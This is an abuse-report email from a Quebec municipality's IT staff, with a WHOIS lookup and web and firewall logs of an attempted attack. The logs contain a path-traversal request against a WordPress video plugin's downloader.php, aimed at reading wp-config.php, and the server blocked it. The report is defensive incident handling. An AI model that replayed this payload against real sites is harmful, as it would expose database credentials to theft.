Subject: Abuse report : 173.208.213.114
Body:
Hello,

There was suspicious activity from an IP address under your control, the relevant log entries are following, with current timezone.
Please take any action you judge necessary to stop this kind of attack.

If you need any other information, feel free to reply to this email.

Thank you!


S=E9bastien Leclerc
Chef de division - informatique
Ville de Saint-Georges
T:: (418) 226-3784

Service informatique
T:: (418) 226-2285
informatique@saint-georges.ca




IP : 173.208.213.114 (Host 114.213.208.173.in-addr.arpa. not found: 3(NXDOMAIN))

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

WHOIS results :
[Querying whois.geektools.com]
[whois.geektools.com]
GeekTools Whois Proxy v5.0.6 Ready.
Checking access for 142.169.245.3... ok.
Final results obtained from whois.arin.net.
Results:

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# The following results may also be obtained via:
# https://whois.arin.net/rest/nets;q=3D173.208.213.114?showDetails=3Dtrue&showARIN=3Dfalse&showNonArinTopLevelNet=3Dfalse&ext=3Dnetref2
#

Riccardo Mori NET-173-208-213-112-1 (NET-173-208-213-112-1) 173.208.213.112 - 173.208.213.119
WholeSale Internet, Inc. WII-OAK-2 (NET-173-208-128-0-1) 173.208.128.0 - 173.208.255.255



#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/public/whoisinaccuracy/index.xhtml
#


Results brought to you by the GeekTools WHOIS Proxy
Server results may be copyrighted and are used with permission.
Your host (142.169.245.3) has visited 13 times today.



=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Related logs (Timezone : -0500) :
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
  Web Servers :
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

173.208.213.114 - - [10/Mar/2016:02:07:33 -0500] "GET http://saint-georges.ca/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=3Dwp-config.php&path=3D../../../../../../../wp-config.php HTTP/1.1" 402 403 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
--851ec437-A--
[10/Mar/2016:02:07:33 --0500] VuEdNX8AAAEAAB2evmEAAAAG 173.208.213.114 36141 127.0.0.1 8080
--851ec437-B--
GET /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=3Dwp-config.php&path=3D../../../../../../../wp-config.php HTTP/1.1
Host: saint-georges.ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
X-Forwarded-For: 173.208.213.114
Accept-Encoding: gzip
X-Varnish: 511520880

--851ec437-F--
HTTP/1.1 402 Payment Required
Last-Modified: Fri, 27 Feb 2015 13:37:32 GMT
ETag: "28b-51011f86dff00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Pragma: public
Cache-Control: public
Content-Length: 403
Content-Type: text/html; charset=3DUTF-8







